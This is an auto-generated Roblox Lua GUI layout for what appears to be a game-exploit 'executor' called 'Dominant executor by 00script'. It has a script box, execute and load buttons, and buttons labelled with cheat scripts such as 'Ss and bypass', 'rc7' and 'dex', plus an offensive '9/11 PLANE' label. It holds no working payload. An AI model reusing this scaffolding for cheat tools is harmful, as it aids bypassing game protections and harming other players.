--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 

designed using localmaze gui creator
]=]

-- Instances: 43 | Scripts: 0 | Modules: 0 | Tags: 0
local LMG2L = {};

-- Players.giruoh_jgry.PlayerGui.ScreenGui
LMG2L["ScreenGui_1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
LMG2L["ScreenGui_1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top
LMG2L["top_2"] = Instance.new("Frame", LMG2L["ScreenGui_1"]);
LMG2L["top_2"]["BorderSizePixel"] = 0;
LMG2L["top_2"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["top_2"]["Size"] = UDim2.new(0, 732, 0, 24);
LMG2L["top_2"]["Position"] = UDim2.new(0, 230, 0, 68);
LMG2L["top_2"]["Name"] = [[top]];


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.TextLabel3
LMG2L["TextLabel3_3"] = Instance.new("TextLabel", LMG2L["top_2"]);
LMG2L["TextLabel3_3"]["TextWrapped"] = true;
LMG2L["TextLabel3_3"]["BorderSizePixel"] = 0;
LMG2L["TextLabel3_3"]["TextScaled"] = true;
LMG2L["TextLabel3_3"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel3_3"]["Size"] = UDim2.new(0, 42, 0, 24);
LMG2L["TextLabel3_3"]["Text"] = [[–]];
LMG2L["TextLabel3_3"]["Name"] = [[TextLabel3]];
LMG2L["TextLabel3_3"]["Position"] = UDim2.new(0, 608, 0, 0);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame
LMG2L["script Frame_4"] = Instance.new("Frame", LMG2L["top_2"]);
LMG2L["script Frame_4"]["BorderSizePixel"] = 0;
LMG2L["script Frame_4"]["BackgroundColor3"] = Color3.fromRGB(228, 228, 228);
LMG2L["script Frame_4"]["Size"] = UDim2.new(0, 732, 0, 398);
LMG2L["script Frame_4"]["Position"] = UDim2.new(0, 0, 0, 24);
LMG2L["script Frame_4"]["Name"] = [[script Frame]];


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.TextButton2
LMG2L["TextButton2_5"] = Instance.new("TextButton", LMG2L["script Frame_4"]);
LMG2L["TextButton2_5"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_5"]["TextSize"] = 10;
LMG2L["TextButton2_5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_5"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_5"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_5"]["Text"] = [[Admin panel]];
LMG2L["TextButton2_5"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_5"]["Position"] = UDim2.new(0, 100, 0, 2);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.TextButton2
LMG2L["TextButton2_6"] = Instance.new("TextButton", LMG2L["script Frame_4"]);
LMG2L["TextButton2_6"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_6"]["TextSize"] = 10;
LMG2L["TextButton2_6"]["BackgroundColor3"] = Color3.fromRGB(240, 240, 240);
LMG2L["TextButton2_6"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_6"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_6"]["Text"] = [[executor]];
LMG2L["TextButton2_6"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_6"]["Position"] = UDim2.new(0, 6, 0, 2);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame
LMG2L["Frame_7"] = Instance.new("Frame", LMG2L["script Frame_4"]);
LMG2L["Frame_7"]["BorderSizePixel"] = 2;
LMG2L["Frame_7"]["BackgroundColor3"] = Color3.fromRGB(238, 238, 238);
LMG2L["Frame_7"]["Size"] = UDim2.new(0, 720, 0, 356);
LMG2L["Frame_7"]["Position"] = UDim2.new(0, 6, 0, 32);
LMG2L["Frame_7"]["BorderColor3"] = Color3.fromRGB(172, 172, 172);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_8"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_8"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_8"]["TextSize"] = 10;
LMG2L["TextButton2_8"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_8"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_8"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_8"]["Text"] = [[ssp]];
LMG2L["TextButton2_8"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_8"]["Position"] = UDim2.new(0, 8, 0, 44);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_9"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_9"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_9"]["TextSize"] = 10;
LMG2L["TextButton2_9"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_9"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_9"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_9"]["Text"] = [[Ss and bypass]];
LMG2L["TextButton2_9"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_9"]["Position"] = UDim2.new(0, 106, 0, 44);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_a"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_a"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_a"]["TextSize"] = 10;
LMG2L["TextButton2_a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_a"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_a"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_a"]["Text"] = [[SEGMA V4]];
LMG2L["TextButton2_a"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_a"]["Position"] = UDim2.new(0, 8, 0, 74);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_b"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_b"]["TextWrapped"] = true;
LMG2L["TextButton2_b"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_b"]["TextSize"] = 10;
LMG2L["TextButton2_b"]["TextScaled"] = true;
LMG2L["TextButton2_b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_b"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_b"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_b"]["Text"] = [[SAMSUNG NOTE]];
LMG2L["TextButton2_b"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_b"]["Position"] = UDim2.new(0, 106, 0, 74);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_c"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_c"]["TextWrapped"] = true;
LMG2L["TextButton2_c"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_c"]["TextSize"] = 10;
LMG2L["TextButton2_c"]["TextScaled"] = true;
LMG2L["TextButton2_c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_c"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_c"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_c"]["Text"] = [[1×4 HADX MINI]];
LMG2L["TextButton2_c"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_c"]["Position"] = UDim2.new(0, 8, 0, 104);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_d"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_d"]["TextWrapped"] = true;
LMG2L["TextButton2_d"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_d"]["TextSize"] = 10;
LMG2L["TextButton2_d"]["TextScaled"] = true;
LMG2L["TextButton2_d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_d"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_d"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_d"]["Text"] = [[PROJECT ZAGA]];
LMG2L["TextButton2_d"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_d"]["Position"] = UDim2.new(0, 106, 0, 104);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_e"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_e"]["TextWrapped"] = true;
LMG2L["TextButton2_e"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_e"]["TextSize"] = 10;
LMG2L["TextButton2_e"]["TextScaled"] = true;
LMG2L["TextButton2_e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_e"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_e"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_e"]["Text"] = [[OUCH SIMSOMP SPAM]];
LMG2L["TextButton2_e"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_e"]["Position"] = UDim2.new(0, 8, 0, 134);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextLabel
LMG2L["TextLabel_f"] = Instance.new("TextLabel", LMG2L["Frame_7"]);
LMG2L["TextLabel_f"]["TextWrapped"] = true;
LMG2L["TextLabel_f"]["BorderSizePixel"] = 0;
LMG2L["TextLabel_f"]["TextSize"] = 14;
LMG2L["TextLabel_f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel_f"]["BackgroundTransparency"] = 1;
LMG2L["TextLabel_f"]["Size"] = UDim2.new(0, 196, 0, 32);
LMG2L["TextLabel_f"]["Text"] = [[---- script ----]];
LMG2L["TextLabel_f"]["Position"] = UDim2.new(0, 8, 0, 6);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_10"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_10"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_10"]["TextSize"] = 10;
LMG2L["TextButton2_10"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_10"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_10"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_10"]["Text"] = [[project eluaria]];
LMG2L["TextButton2_10"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_10"]["Position"] = UDim2.new(0, 106, 0, 134);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_11"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_11"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_11"]["TextSize"] = 10;
LMG2L["TextButton2_11"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_11"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_11"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_11"]["Text"] = [[9/11 PLANE]];
LMG2L["TextButton2_11"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_11"]["Position"] = UDim2.new(0, 8, 0, 164);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_12"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_12"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_12"]["TextSize"] = 10;
LMG2L["TextButton2_12"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_12"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_12"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_12"]["Text"] = [[rc7 2016]];
LMG2L["TextButton2_12"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_12"]["Position"] = UDim2.new(0, 106, 0, 164);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_13"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_13"]["TextWrapped"] = true;
LMG2L["TextButton2_13"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_13"]["TextSize"] = 10;
LMG2L["TextButton2_13"]["TextScaled"] = true;
LMG2L["TextButton2_13"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_13"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_13"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_13"]["Text"] = [[rc7 by 00script]];
LMG2L["TextButton2_13"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_13"]["Position"] = UDim2.new(0, 8, 0, 194);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_14"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_14"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_14"]["TextSize"] = 10;
LMG2L["TextButton2_14"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_14"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_14"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_14"]["Text"] = [[SHIBA OLD]];
LMG2L["TextButton2_14"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_14"]["Position"] = UDim2.new(0, 106, 0, 194);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_15"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_15"]["TextWrapped"] = true;
LMG2L["TextButton2_15"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_15"]["TextSize"] = 10;
LMG2L["TextButton2_15"]["TextScaled"] = true;
LMG2L["TextButton2_15"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_15"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_15"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_15"]["Text"] = [[PROJECT BALLER]];
LMG2L["TextButton2_15"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_15"]["Position"] = UDim2.new(0, 8, 0, 224);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_16"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_16"]["TextWrapped"] = true;
LMG2L["TextButton2_16"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_16"]["TextSize"] = 10;
LMG2L["TextButton2_16"]["TextScaled"] = true;
LMG2L["TextButton2_16"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_16"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_16"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_16"]["Text"] = [[SHELDONI BY Spawn BLOCK v2]];
LMG2L["TextButton2_16"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_16"]["Position"] = UDim2.new(0, 106, 0, 224);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_17"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_17"]["TextWrapped"] = true;
LMG2L["TextButton2_17"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_17"]["TextSize"] = 10;
LMG2L["TextButton2_17"]["TextScaled"] = true;
LMG2L["TextButton2_17"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_17"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_17"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_17"]["Text"] = [[Tco gui style koopgui ]];
LMG2L["TextButton2_17"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_17"]["Position"] = UDim2.new(0, 8, 0, 254);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_18"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_18"]["TextWrapped"] = true;
LMG2L["TextButton2_18"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_18"]["TextSize"] = 10;
LMG2L["TextButton2_18"]["TextScaled"] = true;
LMG2L["TextButton2_18"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_18"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_18"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_18"]["Text"] = [[Project STIGMA LUA]];
LMG2L["TextButton2_18"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_18"]["Position"] = UDim2.new(0, 106, 0, 254);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.script Frame.Frame.TextButton2
LMG2L["TextButton2_19"] = Instance.new("TextButton", LMG2L["Frame_7"]);
LMG2L["TextButton2_19"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_19"]["TextSize"] = 10;
LMG2L["TextButton2_19"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton2_19"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_19"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_19"]["Text"] = [[project secret]];
LMG2L["TextButton2_19"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_19"]["Position"] = UDim2.new(0, 8, 0, 284);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.TextLabel4
LMG2L["TextLabel4_1a"] = Instance.new("TextLabel", LMG2L["top_2"]);
LMG2L["TextLabel4_1a"]["TextWrapped"] = true;
LMG2L["TextLabel4_1a"]["BorderSizePixel"] = 0;
LMG2L["TextLabel4_1a"]["TextScaled"] = true;
LMG2L["TextLabel4_1a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel4_1a"]["Size"] = UDim2.new(0, 360, 0, 24);
LMG2L["TextLabel4_1a"]["Text"] = [[Dominant executor by 00script]];
LMG2L["TextLabel4_1a"]["Name"] = [[TextLabel4]];


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame
LMG2L["minutesFrame_1b"] = Instance.new("Frame", LMG2L["top_2"]);
LMG2L["minutesFrame_1b"]["Visible"] = false;
LMG2L["minutesFrame_1b"]["BorderSizePixel"] = 0;
LMG2L["minutesFrame_1b"]["BackgroundColor3"] = Color3.fromRGB(228, 228, 228);
LMG2L["minutesFrame_1b"]["Size"] = UDim2.new(0, 732, 0, 398);
LMG2L["minutesFrame_1b"]["Position"] = UDim2.new(0, 0, 0, 24);
LMG2L["minutesFrame_1b"]["Name"] = [[minutesFrame]];


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.TextButton7
LMG2L["TextButton7_1c"] = Instance.new("TextButton", LMG2L["minutesFrame_1b"]);
LMG2L["TextButton7_1c"]["BorderSizePixel"] = 2;
LMG2L["TextButton7_1c"]["TextSize"] = 10;
LMG2L["TextButton7_1c"]["BackgroundColor3"] = Color3.fromRGB(240, 240, 240);
LMG2L["TextButton7_1c"]["Size"] = UDim2.new(0, 46, 0, 26);
LMG2L["TextButton7_1c"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton7_1c"]["Text"] = [[dex]];
LMG2L["TextButton7_1c"]["Name"] = [[TextButton7]];
LMG2L["TextButton7_1c"]["Position"] = UDim2.new(0, 632, 0, 4);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.TextButton2
LMG2L["TextButton2_1d"] = Instance.new("TextButton", LMG2L["minutesFrame_1b"]);
LMG2L["TextButton2_1d"]["BorderSizePixel"] = 2;
LMG2L["TextButton2_1d"]["TextSize"] = 10;
LMG2L["TextButton2_1d"]["BackgroundColor3"] = Color3.fromRGB(240, 240, 240);
LMG2L["TextButton2_1d"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton2_1d"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton2_1d"]["Text"] = [[Admin panel]];
LMG2L["TextButton2_1d"]["Name"] = [[TextButton2]];
LMG2L["TextButton2_1d"]["Position"] = UDim2.new(0, 100, 0, 2);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.TextButton8
LMG2L["TextButton8_1e"] = Instance.new("TextButton", LMG2L["minutesFrame_1b"]);
LMG2L["TextButton8_1e"]["BorderSizePixel"] = 2;
LMG2L["TextButton8_1e"]["TextSize"] = 10;
LMG2L["TextButton8_1e"]["BackgroundColor3"] = Color3.fromRGB(240, 240, 240);
LMG2L["TextButton8_1e"]["Size"] = UDim2.new(0, 52, 0, 26);
LMG2L["TextButton8_1e"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton8_1e"]["Text"] = [[ssp]];
LMG2L["TextButton8_1e"]["Name"] = [[TextButton8]];
LMG2L["TextButton8_1e"]["Position"] = UDim2.new(0, 576, 0, 4);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.ScrollingFrame2
LMG2L["ScrollingFrame2_1f"] = Instance.new("ScrollingFrame", LMG2L["minutesFrame_1b"]);
LMG2L["ScrollingFrame2_1f"]["ScrollingDirection"] = Enum.ScrollingDirection.Y;
LMG2L["ScrollingFrame2_1f"]["BorderSizePixel"] = 2;
LMG2L["ScrollingFrame2_1f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["ScrollingFrame2_1f"]["Name"] = [[ScrollingFrame2]];
LMG2L["ScrollingFrame2_1f"]["ScrollBarImageTransparency"] = 1;
LMG2L["ScrollingFrame2_1f"]["Size"] = UDim2.new(0, 152, 0, 358);
LMG2L["ScrollingFrame2_1f"]["Position"] = UDim2.new(0, 576, 0, 34);
LMG2L["ScrollingFrame2_1f"]["BorderColor3"] = Color3.fromRGB(185, 185, 185);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.TextButton
LMG2L["TextButton_20"] = Instance.new("TextButton", LMG2L["minutesFrame_1b"]);
LMG2L["TextButton_20"]["BorderSizePixel"] = 2;
LMG2L["TextButton_20"]["TextSize"] = 10;
LMG2L["TextButton_20"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton_20"]["Size"] = UDim2.new(0, 90, 0, 26);
LMG2L["TextButton_20"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton_20"]["Text"] = [[executor]];
LMG2L["TextButton_20"]["Position"] = UDim2.new(0, 6, 0, 2);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.TextButton4
LMG2L["TextButton4_21"] = Instance.new("TextButton", LMG2L["minutesFrame_1b"]);
LMG2L["TextButton4_21"]["BorderSizePixel"] = 0;
LMG2L["TextButton4_21"]["TextSize"] = 10;
LMG2L["TextButton4_21"]["BackgroundColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton4_21"]["Size"] = UDim2.new(0, 138, 0, 34);
LMG2L["TextButton4_21"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton4_21"]["Text"] = [[clear]];
LMG2L["TextButton4_21"]["Name"] = [[TextButton4]];
LMG2L["TextButton4_21"]["Position"] = UDim2.new(0, 6, 0, 326);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.TextButton6
LMG2L["TextButton6_22"] = Instance.new("TextButton", LMG2L["minutesFrame_1b"]);
LMG2L["TextButton6_22"]["BorderSizePixel"] = 2;
LMG2L["TextButton6_22"]["TextSize"] = 10;
LMG2L["TextButton6_22"]["BackgroundColor3"] = Color3.fromRGB(240, 240, 240);
LMG2L["TextButton6_22"]["Size"] = UDim2.new(0, 46, 0, 26);
LMG2L["TextButton6_22"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton6_22"]["Text"] = [[R6]];
LMG2L["TextButton6_22"]["Name"] = [[TextButton6]];
LMG2L["TextButton6_22"]["Position"] = UDim2.new(0, 682, 0, 4);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.TextButton5
LMG2L["TextButton5_23"] = Instance.new("TextButton", LMG2L["minutesFrame_1b"]);
LMG2L["TextButton5_23"]["BorderSizePixel"] = 0;
LMG2L["TextButton5_23"]["TextSize"] = 10;
LMG2L["TextButton5_23"]["BackgroundColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton5_23"]["Size"] = UDim2.new(0, 138, 0, 28);
LMG2L["TextButton5_23"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton5_23"]["Text"] = [[load]];
LMG2L["TextButton5_23"]["Name"] = [[TextButton5]];
LMG2L["TextButton5_23"]["Position"] = UDim2.new(0, 6, 0, 364);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.TextBox
LMG2L["TextBox_24"] = Instance.new("TextBox", LMG2L["minutesFrame_1b"]);
LMG2L["TextBox_24"]["TextXAlignment"] = Enum.TextXAlignment.Left;
LMG2L["TextBox_24"]["BorderSizePixel"] = 2;
LMG2L["TextBox_24"]["TextYAlignment"] = Enum.TextYAlignment.Top;
LMG2L["TextBox_24"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextBox_24"]["BorderMode"] = Enum.BorderMode.Middle;
LMG2L["TextBox_24"]["PlaceholderText"] = [[-- is script by 00script]];
LMG2L["TextBox_24"]["Size"] = UDim2.new(0, 562, 0, 258);
LMG2L["TextBox_24"]["Position"] = UDim2.new(0, 4, 0, 32);
LMG2L["TextBox_24"]["BorderColor3"] = Color3.fromRGB(236, 236, 236);
LMG2L["TextBox_24"]["Text"] = [[]];


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.TextButton3
LMG2L["TextButton3_25"] = Instance.new("TextButton", LMG2L["minutesFrame_1b"]);
LMG2L["TextButton3_25"]["BorderSizePixel"] = 0;
LMG2L["TextButton3_25"]["TextSize"] = 10;
LMG2L["TextButton3_25"]["BackgroundColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton3_25"]["Size"] = UDim2.new(0, 138, 0, 30);
LMG2L["TextButton3_25"]["BorderColor3"] = Color3.fromRGB(209, 209, 209);
LMG2L["TextButton3_25"]["Text"] = [[execute]];
LMG2L["TextButton3_25"]["Name"] = [[TextButton3]];
LMG2L["TextButton3_25"]["Position"] = UDim2.new(0, 6, 0, 292);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.ScrollingFrame
LMG2L["ScrollingFrame_26"] = Instance.new("ScrollingFrame", LMG2L["minutesFrame_1b"]);
LMG2L["ScrollingFrame_26"]["ScrollingDirection"] = Enum.ScrollingDirection.Y;
LMG2L["ScrollingFrame_26"]["BorderSizePixel"] = 2;
LMG2L["ScrollingFrame_26"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["ScrollingFrame_26"]["ScrollBarImageTransparency"] = 1;
LMG2L["ScrollingFrame_26"]["Size"] = UDim2.new(0, 418, 0, 98);
LMG2L["ScrollingFrame_26"]["Position"] = UDim2.new(0, 148, 0, 294);
LMG2L["ScrollingFrame_26"]["BorderColor3"] = Color3.fromRGB(185, 185, 185);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.minutesFrame.ScrollingFrame.TextLabel
LMG2L["TextLabel_27"] = Instance.new("TextLabel", LMG2L["ScrollingFrame_26"]);
LMG2L["TextLabel_27"]["BorderSizePixel"] = 0;
LMG2L["TextLabel_27"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel_27"]["Size"] = UDim2.new(0, 114, 0, 14);
LMG2L["TextLabel_27"]["Text"] = [[-- Welcome to dominant]];
LMG2L["TextLabel_27"]["Position"] = UDim2.new(0, 2, 0, 2);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.TextLabel2
LMG2L["TextLabel2_28"] = Instance.new("TextLabel", LMG2L["top_2"]);
LMG2L["TextLabel2_28"]["TextWrapped"] = true;
